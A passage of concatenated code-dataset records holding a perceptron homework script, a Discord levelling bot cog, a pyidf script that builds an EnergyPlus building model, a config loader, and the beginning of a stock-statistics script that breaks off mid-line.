0].std()\nx[:, 1] = (x[:, 1] - x[:, 1].mean()) / x[:, 1].std()\nx[:, 2] = (x[:, 2] - x[:, 2].mean()) / x[:, 2].std()\nx[:, 3] = (x[:, 3] - x[:, 3].mean()) / x[:, 3].std()\n\nplt.hist(x[:, 0], bins=100)\nplt.title(\"Features after standardization\")\nplt.show()\n\n# split the data\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.25,\n random_state=0)\n\n# train the model\nclassifier = Perceptron(learning_rate=0.01)\nclassifier.fit(x_train, y_train)\n\n# plot the number of errors during each iteration\nplt.plot(range(1, len(classifier.misclassified_samples) + 1),\n classifier.misclassified_samples, marker='o')\nplt.xlabel('Epoch')\nplt.ylabel('Errors')\nplt.show()\n\n#Accuracy \nfrom sklearn.metrics import accuracy_score\nprint(\"accuracy %f\" % accuracy_score(classifier.predict(x_test), y_test))\n","sub_path":"ISP/week2/hw02-2.py","file_name":"hw02-2.py","file_ext":"py","file_size_in_byte":4110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"479505399","text":"import discord, random\nfrom discord.ext import commands\n\ndef _get_level_xp(n):\n return 5 * (n ** 2) + 50 * n + 100\n\n\ndef _get_level_from_xp(xp):\n remaining_xp = int(xp)\n level = 0\n while remaining_xp >= _get_level_xp(level):\n remaining_xp -= _get_level_xp(level)\n level += 1\n return level\n\nclass ListenerCog(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.guild_id = 257554742371155998\n\n async def check_and_add_roles(self, member: discord.Member):\n level = _get_level_from_xp(self.bot.ranks[member.id])\n try:\n info = self.bot.level_roles[level]\n guild = self.bot.get_guild(self.guild_id)\n role = guild.get_role(info)\n await member.add_roles(role, reason = \"Automatically done for levelling up.\")\n except:\n return\n\n @commands.Cog.listener()\n async def on_message(self, message):\n if message.channel.id in self.bot.blacklist or message.guild.id != 257554742371155998:\n return\n if not message.author.bot:\n self.bot.ranks[message.author.id] += random.randrange(1, 6)\n await self.check_and_add_roles(message.author)\n\n @commands.Cog.listener()\n async def on_member_join(self, member):\n await self.bot.db.execute(\"INSERT OR IGNORE INTO ranks(userId) VALUES(?)\", (member.id,))\n cursor = await self.bot.db.execute(\"SELECT * FROM ranks WHERE userId = ?\", (member.id,))\n row = await cursor.fetchone()\n\n self.bot.ranks.update({row[0]: row[1]})\n\ndef setup(bot):\n bot.add_cog(ListenerCog(bot))\n","sub_path":"cogs/listener.py","file_name":"listener.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"464739654","text":"import logging\nfrom pyidf import ValidationLevel\nimport pyidf\nfrom pyidf.idf import IDF\n\nidf_file_path = r\"Exercise1A.idf\"\n\n\nif __name__ == '__main__':\n\n logging.info(\"start\")\n pyidf.validation_level = ValidationLevel.transition\n idf = IDF()\n\n obj1 = IDF._create_datadict(\"Version\")\n obj1[\"Version Identifier\"] = \"8.4\"\n idf.add(obj1)\n\n obj2 = IDF._create_datadict(\"Building\")\n obj2[\"Name\"] = \"Exercise 1A\"\n obj2[\"North Axis\"] = 0.0\n obj2[\"Terrain\"] = \"Country\"\n obj2[\"Loads Convergence Tolerance Value\"] = 0.04\n obj2[\"Temperature Convergence Tolerance Value\"] = 0.4\n obj2[\"Solar Distribution\"] = \"FullInteriorAndExterior\"\n obj2[\"Maximum Number of Warmup Days\"] = None\n obj2[\"Minimum Number of Warmup Days\"] = 6\n idf.add(obj2)\n\n obj3 = IDF._create_datadict(\"Timestep\")\n obj3[\"Number of Timesteps per Hour\"] = 4\n idf.add(obj3)\n\n obj4 = IDF._create_datadict(\"SurfaceConvectionAlgorithm:Inside\")\n obj4[\"Algorithm\"] = \"TARP\"\n idf.add(obj4)\n\n obj5 = IDF._create_datadict(\"SurfaceConvectionAlgorithm:Outside\")\n obj5[\"Algorithm\"] = \"TARP\"\n idf.add(obj5)\n\n obj6 = IDF._create_datadict(\"HeatBalanceAlgorithm\")\n obj6[\"Algorithm\"] = \"ConductionTransferFunction\"\n idf.add(obj6)\n\n obj7 = IDF._create_datadict(\"ShadowCalculation\")\n obj7[\"Calculation Method\"] = \"AverageOverDaysInFrequency\"\n obj7[\"Calculation Frequency\"] = 20\n idf.add(obj7)\n\n obj8 = IDF._create_datadict(\"SimulationControl\")\n obj8[\"Do Zone Sizing Calculation\"] = \"No\"\n obj8[\"Do System Sizing Calculation\"] = \"No\"\n obj8[\"Do Plant Sizing Calculation\"] = \"No\"\n obj8[\"Run Simulation for Sizing Periods\"] = \"Yes\"\n obj8[\"Run Simulation for Weather File Run Periods\"] = \"No\"\n idf.add(obj8)\n\n obj9 = IDF._create_datadict(\"Site:Location\")\n obj9[\"Name\"] = \"CHICAGO_IL_USA TMY2-94846\"\n obj9[\"Latitude\"] = 41.78\n obj9[\"Longitude\"] = -87.75\n obj9[\"Time Zone\"] = -6.0\n obj9[\"Elevation\"] = 190.0\n idf.add(obj9)\n\n obj10 = IDF._create_datadict(\"SizingPeriod:DesignDay\")\n obj10[\"Name\"] = \"CHICAGO_IL_USA Cooling .4% Conditions DB=>MWB\"\n obj10[\"Month\"] = 7\n obj10[\"Day of Month\"] = 21\n obj10[\"Day Type\"] = \"SummerDesignDay\"\n obj10[\"Maximum Dry-Bulb Temperature\"] = 32.8\n obj10[\"Daily Dry-Bulb Temperature Range\"] = 10.9\n obj10[\"Dry-Bulb Temperature Range Modifier Type\"] = None\n obj10[\"Dry-Bulb Temperature Range Modifier Day Schedule Name\"] = None\n obj10[\"Humidity Condition Type\"] = \"Wetbulb\"\n obj10[\"Wetbulb or DewPoint at Maximum Dry-Bulb\"] = 23.6\n obj10[\"Humidity Condition Day Schedule Name\"] = None\n obj10[\"Humidity Ratio at Maximum Dry-Bulb\"] = None\n obj10[\"Enthalpy at Maximum Dry-Bulb\"] = None\n obj10[\"Daily Wet-Bulb Temperature Range\"] = None\n obj10[\"Barometric Pressure\"] = 99063.21\n obj10[\"Wind Speed\"] = 0.0\n obj10[\"Wind Direction\"] = 0.0\n obj10[\"Rain Indicator\"] = \"No\"\n obj10[\"Snow Indicator\"] = \"No\"\n obj10[\"Daylight Saving Time Indicator\"] = \"No\"\n obj10[\"Solar Model Indicator\"] = \"ASHRAEClearSky\"\n obj10[\"Beam Solar Day Schedule Name\"] = None\n obj10[\"Diffuse Solar Day Schedule Name\"] = None\n obj10[\"ASHRAE Clear Sky Optical Depth for Beam Irradiance (taub)\"] = None\n obj10[\n \"ASHRAE Clear Sky Optical Depth for Diffuse Irradiance (taud)\"] = None\n obj10[\"Sky Clearness\"] = 1.0\n idf.add(obj10)\n\n obj11 = IDF._create_datadict(\"SizingPeriod:DesignDay\")\n obj11[\"Name\"] = \"CHICAGO_IL_USA Heating 99.6% Conditions\"\n obj11[\"Month\"] = 1\n obj11[\"Day of Month\"] = 21\n obj11[\"Day Type\"] = \"WinterDesignDay\"\n obj11[\"Maximum Dry-Bulb Temperature\"] = -21.2\n obj11[\"Daily Dry-Bulb Temperature Range\"] = 0.0\n obj11[\"Dry-Bulb Temperature Range Modifier Type\"] = None\n obj11[\"Dry-Bulb Temperature Range Modifier Day Schedule Name\"] = None\n obj11[\"Humidity Condition Type\"] = \"Wetbulb\"\n obj11[\"Wetbulb or DewPoint at Maximum Dry-Bulb\"] = -21.2\n obj11[\"Humidity Condition Day Schedule Name\"] = None\n obj11[\"Humidity Ratio at Maximum Dry-Bulb\"] = None\n obj11[\"Enthalpy at Maximum Dry-Bulb\"] = None\n obj11[\"Daily Wet-Bulb Temperature Range\"] = None\n obj11[\"Barometric Pressure\"] = 99063.21\n obj11[\"Wind Speed\"] = 4.6\n obj11[\"Wind Direction\"] = 270.0\n obj11[\"Rain Indicator\"] = \"No\"\n obj11[\"Snow Indicator\"] = \"No\"\n obj11[\"Daylight Saving Time Indicator\"] = \"No\"\n obj11[\"Solar Model Indicator\"] = \"ASHRAEClearSky\"\n obj11[\"Beam Solar Day Schedule Name\"] = None\n obj11[\"Diffuse Solar Day Schedule Name\"] = None\n obj11[\"ASHRAE Clear Sky Optical Depth for Beam Irradiance (taub)\"] = None\n obj11[\n \"ASHRAE Clear Sky Optical Depth for Diffuse Irradiance (taud)\"] = None\n obj11[\"Sky Clearness\"] = 0.0\n idf.add(obj11)\n\n obj12 = IDF._create_datadict(\"Site:GroundTemperature:BuildingSurface\")\n obj12[\"January Ground Temperature\"] = 18.3\n obj12[\"February Ground Temperature\"] = 18.2\n obj12[\"March Ground Temperature\"] = 18.3\n obj12[\"April Ground Temperature\"] = 18.4\n obj12[\"May Ground Temperature\"] = 20.1\n obj12[\"June Ground Temperature\"] = 22.0\n obj12[\"July Ground Temperature\"] = 22.3\n obj12[\"August Ground Temperature\"] = 22.5\n obj12[\"September Ground Temperature\"] = 22.5\n obj12[\"October Ground Temperature\"] = 20.7\n obj12[\"November Ground Temperature\"] = 18.9\n obj12[\"December Ground Temperature\"] = 18.5\n idf.add(obj12)\n\n obj13 = IDF._create_datadict(\"Material\")\n obj13[\"Name\"] = \"PLASTERBOARD-1\"\n obj13[\"Roughness\"] = \"MediumSmooth\"\n obj13[\"Thickness\"] = 0.012\n obj13[\"Conductivity\"] = 0.16\n obj13[\"Density\"] = 950.0\n obj13[\"Specific Heat\"] = 840.0\n obj13[\"Thermal Absorptance\"] = 0.9\n obj13[\"Solar Absorptance\"] = 0.6\n obj13[\"Visible Absorptance\"] = 0.6\n idf.add(obj13)\n\n obj14 = IDF._create_datadict(\"Material\")\n obj14[\"Name\"] = \"FIBERGLASS QUILT-1\"\n obj14[\"Roughness\"] = \"Rough\"\n obj14[\"Thickness\"] = 0.066\n obj14[\"Conductivity\"] = 0.04\n obj14[\"Density\"] = 12.0\n obj14[\"Specific Heat\"] = 840.0\n obj14[\"Thermal Absorptance\"] = 0.9\n obj14[\"Solar Absorptance\"] = 0.6\n obj14[\"Visible Absorptance\"] = 0.6\n idf.add(obj14)\n\n obj15 = IDF._create_datadict(\"Material\")\n obj15[\"Name\"] = \"WOOD SIDING-1\"\n obj15[\"Roughness\"] = \"Rough\"\n obj15[\"Thickness\"] = 0.009\n obj15[\"Conductivity\"] = 0.14\n obj15[\"Density\"] = 530.0\n obj15[\"Specific Heat\"] = 900.0\n obj15[\"Thermal Absorptance\"] = 0.9\n obj15[\"Solar Absorptance\"] = 0.6\n obj15[\"Visible Absorptance\"] = 0.6\n idf.add(obj15)\n\n obj16 = IDF._create_datadict(\"Material\")\n obj16[\"Name\"] = \"PLASTERBOARD-2\"\n obj16[\"Roughness\"] = \"Rough\"\n obj16[\"Thickness\"] = 0.01\n obj16[\"Conductivity\"] = 0.16\n obj16[\"Density\"] = 950.0\n obj16[\"Specific Heat\"] = 840.0\n obj16[\"Thermal Absorptance\"] = 0.9\n obj16[\"Solar Absorptance\"] = 0.6\n obj16[\"Visible Absorptance\"] = 0.6\n idf.add(obj16)\n\n obj17 = IDF._create_datadict(\"Material\")\n obj17[\"Name\"] = \"FIBERGLASS QUILT-2\"\n obj17[\"Roughness\"] = \"Rough\"\n obj17[\"Thickness\"] = 0.1118\n obj17[\"Conductivity\"] = 0.04\n obj17[\"Density\"] = 12.0\n obj17[\"Specific Heat\"] = 840.0\n obj17[\"Thermal Absorptance\"] = 0.9\n obj17[\"Solar Absorptance\"] = 0.6\n obj17[\"Visible Absorptance\"] = 0.6\n idf.add(obj17)\n\n obj18 = IDF._create_datadict(\"Material\")\n obj18[\"Name\"] = \"ROOF DECK\"\n obj18[\"Roughness\"] = \"Rough\"\n obj18[\"Thickness\"] = 0.019\n obj18[\"Conductivity\"] = 0.14\n obj18[\"Density\"] = 530.0\n obj18[\"Specific Heat\"] = 900.0\n obj18[\"Thermal Absorptance\"] = 0.9\n obj18[\"Solar Absorptance\"] = 0.6\n obj18[\"Visible Absorptance\"] = 0.6\n idf.add(obj18)\n\n obj19 = IDF._create_datadict(\"Material\")\n obj19[\"Name\"] = \"HF-C5\"\n obj19[\"Roughness\"] = \"MediumRough\"\n obj19[\"Thickness\"] = 0.1015\n obj19[\"Conductivity\"] = 1.7296\n obj19[\"Density\"] = 2243.0\n obj19[\"Specific Heat\"] = 837.0\n obj19[\"Thermal Absorptance\"] = 0.9\n obj19[\"Solar Absorptance\"] = 0.65\n obj19[\"Visible Absorptance\"] = 0.65\n idf.add(obj19)\n\n obj20 = IDF._create_datadict(\"Construction\")\n obj20[\"Name\"] = \"LTWALL\"\n obj20[\"Outside Layer\"] = \"WOOD SIDING-1\"\n obj20[\"Layer 2\"] = \"FIBERGLASS QUILT-1\"\n obj20[\"Layer 3\"] = \"PLASTERBOARD-1\"\n idf.add(obj20)\n\n obj21 = IDF._create_datadict(\"Construction\")\n obj21[\"Name\"] = \"LTFLOOR\"\n obj21[\"Outside Layer\"] = \"HF-C5\"\n idf.add(obj21)\n\n obj22 = IDF._create_datadict(\"Construction\")\n obj22[\"Name\"] = \"LTROOF\"\n obj22[\"Outside Layer\"] = \"ROOF DECK\"\n obj22[\"Layer 2\"] = \"FIBERGLASS QUILT-2\"\n obj22[\"Layer 3\"] = \"PLASTERBOARD-2\"\n idf.add(obj22)\n\n obj23 = IDF._create_datadict(\"Zone\")\n obj23[\"Name\"] = \"ZONE ONE\"\n obj23[\"Direction of Relative North\"] = 0.0\n obj23[\"X Origin\"] = 0.0\n obj23[\"Y Origin\"] = 0.0\n obj23[\"Z Origin\"] = 0.0\n obj23[\"Type\"] = 1\n obj23[\"Multiplier\"] = 1\n obj23[\"Ceiling Height\"] = 2.7\n obj23[\"Volume\"] = 129.6\n idf.add(obj23)\n\n obj24 = IDF._create_datadict(\"GlobalGeometryRules\")\n obj24[\"Starting Vertex Position\"] = \"UpperLeftCorner\"\n obj24[\"Vertex Entry Direction\"] = \"Counterclockwise\"\n obj24[\"Coordinate System\"] = \"World\"\n idf.add(obj24)\n\n obj25 = IDF._create_datadict(\"BuildingSurface:Detailed\")\n obj25[\"Name\"] = \"SURFACE NORTH\"\n obj25[\"Surface Type\"] = \"Wall\"\n obj25[\"Construction Name\"] = \"LTWALL\"\n obj25[\"Zone Name\"] = \"ZONE ONE\"\n obj25[\"Outside Boundary Condition\"] = \"Outdoors\"\n obj25[\"Outside Boundary Condition Object\"] = None\n obj25[\"Sun Exposure\"] = \"SunExposed\"\n obj25[\"Wind Exposure\"] = \"WindExposed\"\n obj25[\"View Factor to Ground\"] = 0.5\n obj25[\"Number of Vertices\"] = 4.0\n obj25.add_extensible(8.0, 6.0, 2.7)\n obj25.add_extensible(8.0, 6.0, 0.0)\n obj25.add_extensible(0.0, 6.0, 0.0)\n obj25.add_extensible(0.0, 6.0, 2.7)\n idf.add(obj25)\n\n obj26 = IDF._create_datadict(\"BuildingSurface:Detailed\")\n obj26[\"Name\"] = \"ZONE SURFACE EAST\"\n obj26[\"Surface Type\"] = \"Wall\"\n obj26[\"Construction Name\"] = \"LTWALL\"\n obj26[\"Zone Name\"] = \"ZONE ONE\"\n obj26[\"Outside Boundary Condition\"] = \"Outdoors\"\n obj26[\"Outside Boundary Condition Object\"] = None\n obj26[\"Sun Exposure\"] = \"SunExposed\"\n obj26[\"Wind Exposure\"] = \"WindExposed\"\n obj26[\"View Factor to Ground\"] = 0.5\n obj26[\"Number of Vertices\"] = 4.0\n obj26.add_extensible(8.0, 0.0, 2.7)\n obj26.add_extensible(8.0, 0.0, 0.0)\n obj26.add_extensible(8.0, 6.0, 0.0)\n obj26.add_extensible(8.0, 6.0, 2.7)\n idf.add(obj26)\n\n obj27 = IDF._create_datadict(\"BuildingSurface:Detailed\")\n obj27[\"Name\"] = \"ZONE SURFACE SOUTH\"\n obj27[\"Surface Type\"] = \"Wall\"\n obj27[\"Construction Name\"] = \"LTWALL\"\n obj27[\"Zone Name\"] = \"ZONE ONE\"\n obj27[\"Outside Boundary Condition\"] = \"Outdoors\"\n obj27[\"Outside Boundary Condition Object\"] = None\n obj27[\"Sun Exposure\"] = \"SunExposed\"\n obj27[\"Wind Exposure\"] = \"WindExposed\"\n obj27[\"View Factor to Ground\"] = 0.5\n obj27[\"Number of Vertices\"] = 4.0\n obj27.add_extensible(0.0, 0.0, 2.7)\n obj27.add_extensible(0.0, 0.0, 0.0)\n obj27.add_extensible(8.0, 0.0, 0.0)\n obj27.add_extensible(8.0, 0.0, 2.7)\n idf.add(obj27)\n\n obj28 = IDF._create_datadict(\"BuildingSurface:Detailed\")\n obj28[\"Name\"] = \"ZONE SURFACE WEST\"\n obj28[\"Surface Type\"] = \"Wall\"\n obj28[\"Construction Name\"] = \"LTWALL\"\n obj28[\"Zone Name\"] = \"ZONE ONE\"\n obj28[\"Outside Boundary Condition\"] = \"Outdoors\"\n obj28[\"Outside Boundary Condition Object\"] = None\n obj28[\"Sun Exposure\"] = \"SunExposed\"\n obj28[\"Wind Exposure\"] = \"WindExposed\"\n obj28[\"View Factor to Ground\"] = 0.5\n obj28[\"Number of Vertices\"] = 4.0\n obj28.add_extensible(0.0, 6.0, 2.7)\n obj28.add_extensible(0.0, 6.0, 0.0)\n obj28.add_extensible(0.0, 0.0, 0.0)\n obj28.add_extensible(0.0, 0.0, 2.7)\n idf.add(obj28)\n\n obj29 = IDF._create_datadict(\"BuildingSurface:Detailed\")\n obj29[\"Name\"] = \"ZONE SURFACE FLOOR\"\n obj29[\"Surface Type\"] = \"Floor\"\n obj29[\"Construction Name\"] = \"LTFLOOR\"\n obj29[\"Zone Name\"] = \"ZONE ONE\"\n obj29[\"Outside Boundary Condition\"] = \"Ground\"\n obj29[\"Outside Boundary Condition Object\"] = None\n obj29[\"Sun Exposure\"] = \"NoSun\"\n obj29[\"Wind Exposure\"] = \"NoWind\"\n obj29[\"View Factor to Ground\"] = 0.0\n obj29[\"Number of Vertices\"] = 4.0\n obj29.add_extensible(0.0, 0.0, 0.0)\n obj29.add_extensible(0.0, 6.0, 0.0)\n obj29.add_extensible(8.0, 6.0, 0.0)\n obj29.add_extensible(8.0, 0.0, 0.0)\n idf.add(obj29)\n\n obj30 = IDF._create_datadict(\"BuildingSurface:Detailed\")\n obj30[\"Name\"] = \"ZONE SURFACE ROOF\"\n obj30[\"Surface Type\"] = \"Roof\"\n obj30[\"Construction Name\"] = \"LTROOF\"\n obj30[\"Zone Name\"] = \"ZONE ONE\"\n obj30[\"Outside Boundary Condition\"] = \"Outdoors\"\n obj30[\"Outside Boundary Condition Object\"] = None\n obj30[\"Sun Exposure\"] = \"SunExposed\"\n obj30[\"Wind Exposure\"] = \"WindExposed\"\n obj30[\"View Factor to Ground\"] = 0.0\n obj30[\"Number of Vertices\"] = 4.0\n obj30.add_extensible(0.0, 6.0, 2.7)\n obj30.add_extensible(0.0, 0.0, 2.7)\n obj30.add_extensible(8.0, 0.0, 2.7)\n obj30.add_extensible(8.0, 6.0, 2.7)\n idf.add(obj30)\n\n obj31 = IDF._create_datadict(\"ScheduleTypeLimits\")\n obj31[\"Name\"] = \"Any Number\"\n idf.add(obj31)\n\n obj32 = IDF._create_datadict(\"Schedule:Compact\")\n obj32[\"Name\"] = \"ALWAYS 4\"\n obj32[\"Schedule Type Limits Name\"] = \"Any Number\"\n obj32.add_extensible(\"Through: 12/31\")\n obj32.add_extensible(\"For: AllDays\")\n obj32.add_extensible(\"Until: 24:00\")\n obj32.add_extensible(\"4\")\n idf.add(obj32)\n\n obj33 = IDF._create_datadict(\"Schedule:Compact\")\n obj33[\"Name\"] = \"ALWAYS 20\"\n obj33[\"Schedule Type Limits Name\"] = \"Any Number\"\n obj33.add_extensible(\"Through: 12/31\")\n obj33.add_extensible(\"For: AllDays\")\n obj33.add_extensible(\"Until: 24:00\")\n obj33.add_extensible(\"20\")\n idf.add(obj33)\n\n obj34 = IDF._create_datadict(\"Schedule:Compact\")\n obj34[\"Name\"] = \"ALWAYS 24\"\n obj34[\"Schedule Type Limits Name\"] = \"Any Number\"\n obj34.add_extensible(\"Through: 12/31\")\n obj34.add_extensible(\"For: AllDays\")\n obj34.add_extensible(\"Until: 24:00\")\n obj34.add_extensible(\"24\")\n idf.add(obj34)\n\n obj35 = IDF._create_datadict(\"ZoneHVAC:EquipmentConnections\")\n obj35[\"Zone Name\"] = \"ZONE ONE\"\n obj35[\"Zone Conditioning Equipment List Name\"] = \"ZONE ONE Equipment\"\n obj35[\"Zone Air Inlet Node or NodeList Name\"] = \"ZONE ONE Supply Inlet\"\n obj35[\"Zone Air Exhaust Node or NodeList Name\"] = None\n obj35[\"Zone Air Node Name\"] = \"ZONE ONE Zone Air Node\"\n obj35[\"Zone Return Air Node Name\"] = \"ZONE ONE Return Outlet\"\n idf.add(obj35)\n\n obj36 = IDF._create_datadict(\"ZoneHVAC:EquipmentList\")\n obj36[\"Name\"] = \"ZONE ONE Equipment\"\n obj36.add_extensible(\n \"ZoneHVAC:IdealLoadsAirSystem\",\n \"ZONE ONE Purchased Air\",\n 1,\n 1)\n idf.add(obj36)\n\n obj37 = IDF._create_datadict(\"ZoneHVAC:IdealLoadsAirSystem\")\n obj37[\"Name\"] = \"ZONE ONE Purchased Air\"\n obj37[\"Availability Schedule Name\"] = None\n obj37[\"Zone Supply Air Node Name\"] = \"ZONE ONE Supply Inlet\"\n obj37[\"Zone Exhaust Air Node Name\"] = None\n obj37[\"Maximum Heating Supply Air Temperature\"] = 50.0\n obj37[\"Minimum Cooling Supply Air Temperature\"] = 13.0\n obj37[\"Maximum Heating Supply Air Humidity Ratio\"] = 0.015\n obj37[\"Minimum Cooling Supply Air Humidity Ratio\"] = 0.01\n obj37[\"Heating Limit\"] = \"NoLimit\"\n obj37[\"Maximum Heating Air Flow Rate\"] = None\n obj37[\"Maximum Sensible Heating Capacity\"] = None\n obj37[\"Cooling Limit\"] = \"NoLimit\"\n obj37[\"Maximum Cooling Air Flow Rate\"] = None\n obj37[\"Maximum Total Cooling Capacity\"] = None\n obj37[\"Heating Availability Schedule Name\"] = None\n obj37[\"Cooling Availability Schedule Name\"] = None\n obj37[\"Dehumidification Control Type\"] = \"ConstantSupplyHumidityRatio\"\n obj37[\"Cooling Sensible Heat Ratio\"] = None\n obj37[\"Humidification Control Type\"] = \"ConstantSupplyHumidityRatio\"\n obj37[\"Design Specification Outdoor Air Object Name\"] = None\n obj37[\"Outdoor Air Inlet Node Name\"] = None\n obj37[\"Demand Controlled Ventilation Type\"] = None\n obj37[\"Outdoor Air Economizer Type\"] = None\n obj37[\"Heat Recovery Type\"] = None\n obj37[\"Sensible Heat Recovery Effectiveness\"] = None\n obj37[\"Latent Heat Recovery Effectiveness\"] = None\n idf.add(obj37)\n\n obj38 = IDF._create_datadict(\"ZoneControl:Thermostat\")\n obj38[\"Name\"] = \"ZONE ONE Thermostat\"\n obj38[\"Zone or ZoneList Name\"] = \"ZONE ONE\"\n obj38[\"Control Type Schedule Name\"] = \"ALWAYS 4\"\n obj38[\"Control 1 Object Type\"] = \"ThermostatSetpoint:DualSetpoint\"\n obj38[\"Control 1 Name\"] = \"Office Thermostat Dual SP Control\"\n idf.add(obj38)\n\n obj39 = IDF._create_datadict(\"ThermostatSetpoint:DualSetpoint\")\n obj39[\"Name\"] = \"Office Thermostat Dual SP Control\"\n obj39[\"Heating Setpoint Temperature Schedule Name\"] = \"ALWAYS 20\"\n obj39[\"Cooling Setpoint Temperature Schedule Name\"] = \"ALWAYS 24\"\n idf.add(obj39)\n\n obj40 = IDF._create_datadict(\"Output:Variable\")\n obj40[\"Key Value\"] = \"*\"\n obj40[\"Variable Name\"] = \"Site Outdoor Air Drybulb Temperature\"\n obj40[\"Reporting Frequency\"] = \"Hourly\"\n idf.add(obj40)\n\n obj41 = IDF._create_datadict(\"Output:Variable\")\n obj41[\"Key Value\"] = \"*\"\n obj41[\"Variable Name\"] = \"Zone Air System Sensible Cooling Energy\"\n obj41[\"Reporting Frequency\"] = \"Hourly\"\n idf.add(obj41)\n\n obj42 = IDF._create_datadict(\"Output:Variable\")\n obj42[\"Key Value\"] = \"*\"\n obj42[\"Variable Name\"] = \"Zone Air System Sensible Heating Energy\"\n obj42[\"Reporting Frequency\"] = \"Hourly\"\n idf.add(obj42)\n\n obj43 = IDF._create_datadict(\"Output:Variable\")\n obj43[\"Key Value\"] = \"*\"\n obj43[\"Variable Name\"] = \"Zone Air Temperature\"\n obj43[\"Reporting Frequency\"] = \"Hourly\"\n idf.add(obj43)\n\n obj44 = IDF._create_datadict(\"Output:Meter\")\n obj44[\"Name\"] = \"DistrictHeating:Facility\"\n obj44[\"Reporting Frequency\"] = \"Hourly\"\n idf.add(obj44)\n\n obj45 = IDF._create_datadict(\"Output:Meter\")\n obj45[\"Name\"] = \"DistrictCooling:Facility\"\n obj45[\"Reporting Frequency\"] = \"Hourly\"\n idf.add(obj45)\n\n obj46 = IDF._create_datadict(\"Output:Surfaces:Drawing\")\n obj46[\"Report Type\"] = \"DXF\"\n idf.add(obj46)\n\n obj47 = IDF._create_datadict(\"Output:Constructions\")\n obj47[\"Details Type 1\"] = \"Constructions\"\n idf.add(obj47)\n\n obj48 = IDF._create_datadict(\"Output:VariableDictionary\")\n obj48[\"Key Field\"] = \"Regular\"\n idf.add(obj48)\n\n idf.save(idf_file_path)\n","sub_path":"examples/Exercise1A_named.py","file_name":"Exercise1A_named.py","file_ext":"py","file_size_in_byte":18613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"629340473","text":"from configparser import SafeConfigParser\nimport os\n\ndef get_config():\n\tconfig = SafeConfigParser()\n\tconfig_filename = \"config_shopee.conf\"\n\tconfig_filepath = os.path.join(os.path.dirname(os.path.realpath(__file__)), config_filename)\n\n\tif os.path.exists(config_filepath) == False:\n\t\tconfig_filepath = os.path.join(os.getenv(\"HOME\"), \".tests_conf\", config_filename)\n\n\tconfig.read(config_filepath)\n\n\treturn config\n","sub_path":"lib/shopee/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"8388563","text":"\ndebug = None\nimport numpy as np\nimport z\nimport rows\nimport queue\nimport buy\nimport sliding\nimport statistics\nimport table_print\nfrom scipy import stats\nimport args\n\nif debug:\n print (\"debugging {}\".format(debug))\nstart = 60\neach = 10\nistart = -1*start\nreq = start - 20\ndates = z.getp(\"dates\")\ndays_at_a_time = 22\nmonths6 = days_at_a_time * 6\n\nhalf = int(days_at_a_time / 2)\niterations = 2\nfirstdate = \"2018-03-23\"\nrecovdate = \"2020-03-23\"\nspecial = dict()\n\ndef percentile(array, flip = False, neg_only=False, considerate = None):\n considerate = considerate if considerate else array[-1]\n if neg_only :\n consideration = array[:-1]\n\n if considerate < 1:\n nchgs = [b for b in consideration if b < 1 ]\n return round(100-stats.percentileofscore(nchgs, considerate, kind ='strict'),1)\n else:\n nchgs = [b for b in consideration if b > 1 ]\n return round(stats.percentileofscore(nchgs, considerate, kind ='strict'),1)\n\n if not flip:\n return round(100 - stats.percentileofscore(array[:-1], considerate, kind ='strict'),1)\n\n return round(stats.percentileofscore(array[:-1], considerate, kind ='strict'),1)\n\nrecent_size = 4\ndef proc(astock, title = None, store = True):\n global special\n if debug:\n print(\"days_at_a_time: {}\".format( days_at_a_time))\n\n closes6m = sliding.WindowQueue(months6)\n\n closes = sliding.WindowQueue(days_at_a_time)\n changes = sliding.WindowQueue(days_at_a_time)\n lows = sliding.WindowQueue(days_at_a_time, needMin=True)\n highs = sliding.WindowQueue(days_at_a_time, needMax=True)\n\n saved_dates = list()\n betas = list()\n rc = None\n prevclose = None\n\n betas = list()\n one_day_changes = list()\n lowChanges = list()\n highChanges = list()\n one_month_changes = list()\n drop_froms = list()\n one_year_changes = list()\n month6_changes = list()\n one_day_lows = list()\n\n mc = buy.getFrom(\"latestmc\", astock, 9999)\n bta = args.args.bta\n\n for i, row in enumerate(buy.getRows(astock, firstdate)):\n try:\n c_low = float(row['Low'])\n c_high = float(row['High'])\n date = row['Date']\n c_close = float(row[z.closekey])\n except:\n print(\"row : {}\".format( row ))\n print(\"astock: {}\".format( astock))\n print(\"firstdate: {}\".format( firstdate))\n print(\"no low? astock: {}\".format( astock))\n return None\n\n if prevclose:\n one_day_changes.append(round(c_close/prevclose,3))\n one_day_lows.append(round(c_low/prevclose,3))\n\n prevclose = c_close\n\n if debug and i == 0:\n print(\"first date:{} c_close: {}\".format( date, c_close ))\n\n if date == recovdate:\n rc = c_close\n saved_dates.append(date)\n\n if bta and mc < 1500 and mc > 500:\n closes6m.add_tail(c_close)\n\n closes.add_tail(c_close)\n lows.add_tail(min(c_low, c_close))\n highs.add_tail(max(c_high, c_close))\n\n if closes6m.full():\n first_close = closes.get()\n chg = round(c_close / first_close,3)\n month6_changes.append(chg)\n\n if closes.full():\n\n close_list = list(closes.main)\n\n first_close = closes.get()\n lowest = lows.get_minimum()\n chg = round(lowest / first_close,4)\n lowChanges.append(chg)\n\n highest = highs.get_maximum()\n chg2 = round(highest / first_close,4)\n highChanges.append(chg2)\n\n monthchg = round( closes.main[-1]/ first_close ,3)\n beta = round(highest/lowest,2)\n\n one_month_changes.append(monthchg)\n betas.append(beta)\n\n drop_from = round(close_list[-1]/max(close_list[:-1]),3)\n drop_froms.append(drop_from)\n# if debug:\n# print(\"drop_from : {}\".format( drop_from ))\n \n\n closes_list = list(closes.main)\n lows_list = list(lows.main)\n\n if args.args.live:\n try:\n live_price = z.getLiveData(astock, key = \"price\")\n one_day_changes.append(live_price/c_close)\n month_ago = list(closes.main)[-22]\n one_month_changes.append(live_price/month_ago)\n closes_list.append(live_price)\n lows_list.append(live_price)\n except:\n pass\n\n items = list()\n for i, close in enumerate(closes_list):\n consideration = closes_list[i:i+recent_size]\n consider2 = 